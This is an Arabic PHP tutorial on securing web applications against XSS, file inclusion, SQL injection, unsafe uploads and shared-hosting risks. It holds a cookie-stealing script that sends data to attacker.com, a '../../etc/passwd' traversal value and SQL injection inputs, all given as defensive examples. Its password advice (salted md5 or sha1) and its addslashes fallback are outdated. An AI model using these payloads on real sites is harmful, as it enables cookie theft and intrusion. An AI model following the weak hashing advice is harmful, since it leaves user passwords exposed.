ببساطة هي ايجاد المهاجم ثغرة في نظام التحقق في برنامجك لحقن أكواد javascript (أو غيرها) تقوم بأفعال خبيثة كالحصول على الكعكات (cookies) التي قام موقعك بتخزينها على جهاز المستخدم , فمثلا ً لو كان برامجك يسمح للمستخدمين بكتابة تعليقات ولم تقم بفلترة مُدخلات المستخدمين ; فيتمكن المهاجم من كتابة الكود البسيط التالي في تعليق : <script type="text/javascript"> document.location = "http://attacker.com/index.php?cookie=" + document.cookie;</script>لذا يجب ازالة (أو استبدال) وسوم HTML لتجنب حدوث ثغرات XSS وذلك عن طريق الدوال strip_tags (التي تقوم بحذف جميع وسوم HTML أو php ) أو htmlspecialchars (التي تستبدل عدد من ما يسمى entities بمكافئاتها) . (تم الحديث عن الفروق بين htmlspecialchars و htmlentities وغيرها من المواضيع في درس التعامل مع السلاسل النصية و التعابير النظامية) . تضمين الملفات : يمكن للغة php تضمين ملفات اخرى سواء ً أكانت ملفات php أم ملفات بصيغة اخرى (يتم اظهارها مباشرة في المتصفح) . ومن المفضل التقليل قدر الامكان من استخدام مدخلات المستخدم في تضمين الملفات باستخدام include أو require . فمثلا ً كود php التالي الذي يقوم بتضمين ملف خاص بأحد المستخدمين : <?phpinclude "users/{$_GET['user']}";?>ماذا لو تم تحديد القيمة "../../etc/passwd" كقيمة $_GET['user'] ؟! . وفي حال تم تحديد لاحقة للملف الذي سوف يتم تضمينه فإن ذلك لا يؤدي لزيادة الأمان : <?phpinclude "users/{$_GET['user']}.php";?>فيمكن تجاوز الاحقة بكل بساطة عن طريق اضافة ما يُسمى null byte الى نهاية الجملة "../../etc/passwd" , وللتخلص من هذه التعقيدات ; يُفضل دائما ً استخدام الدالة basename عند الحاجة الى استخدام مدخلات المستخدم في مسارات الملفات . حقن تعليمات SQL : يعتبر حقن تعليمات SQL من أشهر طرق اختراق قواعد البيانات . فمثلا لو لدينا تعليمة sql التالية التي تستخدم للتحقق من اسم المستخدم و كلمة المرور : $query = " SELECT name, age FROM users WHERE name = '{$_GET['name']}' AND passwd = '{$_GET['passwd']}'";ماذا لو قام المستخدم بادخال اسم المستخدم بالطريقة التالية : "admin'--" الرمز -- هو رمز التعليق في تعليمات sql , أو قام بادخال كلمة المرور على الشكل "pass' OR 1=1" فهذا يجعل الشرط محقق دائما ً (يمكن قراءة موضوع عن حقن تعليمات sql لاخ Xacker ) ويوجد عدد من الطرق التخلص من هذه المشكلة وبشكل عام تُساعد الدالة mysqli_real_escape_string على التقليل من مخاطر هذا النوع من الهجوم (وفي حال لم يتوفر لخادم قواعد البيانات التي تستخدمها مثل الدالة السابقة يمكنك استخدام الدالة addslashes ), ومن الجيد استخدام php للتحقق من كلمة المرور بدلا ً من القيام بذلك مباشرة في SQL . عدم استخدام القيمة $_FILES[‘file’][‘type’] للتحقق من نوع الملف المرفوع : هنالك خطأ شائع باستخدام $_FILES[‘file’][‘type’] للتحقق من نوع الملف حيث يعبر عن قيمة ما يُسمى MIME type والتي يمكن تغييرها عن طريق HTTP Request , فعوضا ً عن ذلك نقوم بالتحقق من نوع الملف عن طريق امتداده ( باستخدام الدالة explode وبالطريقة التي تم شرحها في درس التعامل مع الملفات ) . و تغيير اسم الملف وجعله اسماً عشوائياً و تخزين الاسم الأصلي للملف في قاعدة البيانات مع ربطه مع الاسم الجديد . استخدام احدى دوال التشفير عند تخزين كلمات المرور في قاعدة البيانات : تخزين كلمات المرور الخاصة بالمستخدمين كما هي بدون تشفير يُسهل الكشف عن حسابات المستخدمين في حال تعرضت قاعدة البيانات للاختراق . ولهذه المهمة نستخدم إحدى الدالتين md5 او sh1 اللتان يمرر اليهما النص المراد تشفيره كوسيط وحيد . (ويوجد عدد كبير من دوال التشفير الموجودة في مكتبة mcrypt ويمكنك الاطلاع عليها على الرابط التالي) الدالتين md5 , sh1 تقومان بشفير السلسلة النصية المُمررة اليهم بطريق واحد أي أن العبارة المشفرة لا يمكن ابداً إعادتها إلى حالتها السابقة قبل التشفير . لكن المخترقين يقومون باستخدام طريقة brute-force حيث يقومون بتجرية عدد كبير من كلمات المرور ( إما عن طريق كلمات من القاموس أو بتجربة جميع الأحرف) ويوجد أيضاً جداول تحوي على سلاسل نصية بأطوال مختلفة مرتبطة بشفرة md5 أو sh1 وتسمى بجداول rainbow ويكون البحث فيها أسرع بكثير لكنها كبير الجحم . وعادةً نقوم بإضافة كلمة عشوائية (تُسمى salt) قبل أو بعد ( أو قبل وبعد ) كلمة المرور الذي يؤدي إلى زيادة طولها وتصعيب المهمة على المُهاجم كما في المثال التالي : <?php$salt = '[email protected]$!#dsadsf234r5dfsA';$password = md5($salt . $_GET['password'].$salt);echo $password;?> حجب حساب المستخدم عند تجاوز عدد محاولات دخوله عددا ً معينا ً : فمعظم الخدمات الشهيرة تقوم بحجب حساب المستخدم لمدة 24 ساعة عند تجاوز عدد المحاولات الخاطئة لتسجيل الدخول 10 مرات لمنع اكتشاف كلمة المرور بطريقة brute-force . المشاكل الامنية المُتعلقة بالاستضافة المشتركة : عادة , تقوم شركات الاستضافة باستضافة عدة مواقع على نفس الخادم , هذا الأمر يُعرض تطبيق php الى مخاطر إضافية , فكما تعلم فإن المستخدم nobody هو المستخدم الذي يقوم بتنفيذ اكواد php , فيمكن كتابة برامج php بسيطة لقراءة الكود المصدري لموقعك , وبسبب ذلك فإن ملف config.php الذي يحوي بيانات الاتصال بقاعدة البيانات يُمكن قراءته من احد المستخدمين في نفس الخادم !! , لذا يُفضل تخزين جميع المعلومات الخاصة بالموقع في قاعدة البيانات وتخزين اسم مستخدم وكلمة مرور قاعدة البيانات في ملف منفصل وليكن محتواه كالتالي : SetEnv USERNAME "user"SetEnv PASSWORD "pass"و بالطبع يجب تضمين هذا الملف باضافة السطر التالي الى ملف الاعدادت httpd.conf : Include "/config_path/config"وعدم اعطاء الملف السابق صلاحيات القراءة لأي مستخدم , مما يجعل قراءته متعذره على اي مستخدم باستثناء root , وبما ان خادم apache يتم تشغيله بصلاحيات المدير فهو قادر على قراءة ملف الاعدادات السابق . يمكن الوصول الى المعلومات المُخزنة فيه عن طريق المصفوفة $_SERVER كما يلي : <?phpecho $_SERVER['USERNAME']; //prints userecho $_SERVER['PASSWORD']; //prints pass?>وكذلك الأمر بالنسبة الى الجلسات حيث غالبا ً يتم تخزينها في مجلد /tmp , ويُفضل استخدام قواعد البيانات لتخزينها عن طريق الدالة session_set_save_handler كما هو مشروح في موقع php.net . بالطبع موضوع الحماية ليس بالموضوع السهل ويتطلب دراية واسعة بمختلف التقنيات وكان هذا الدرس بداية و مقدمة عن حماية تطبيقات الويب و يوجد عدد من الكتب تتحدث عن هذا المجال وأفضلها كتاب Hacking Exposed : web application security الذي يتحدث باستفاضة عن هذا الموضوع بالإضافة الى كتاب SQL Injection Attacks and Defense الذي يتحدث عن طريق الحماية من حقن تعليمات SQL وفي حال وجود اي معلومة مغلوطة أرجو التنبيه لها :) .   الدرس السابق | الإنتقال للموضوع الأساسي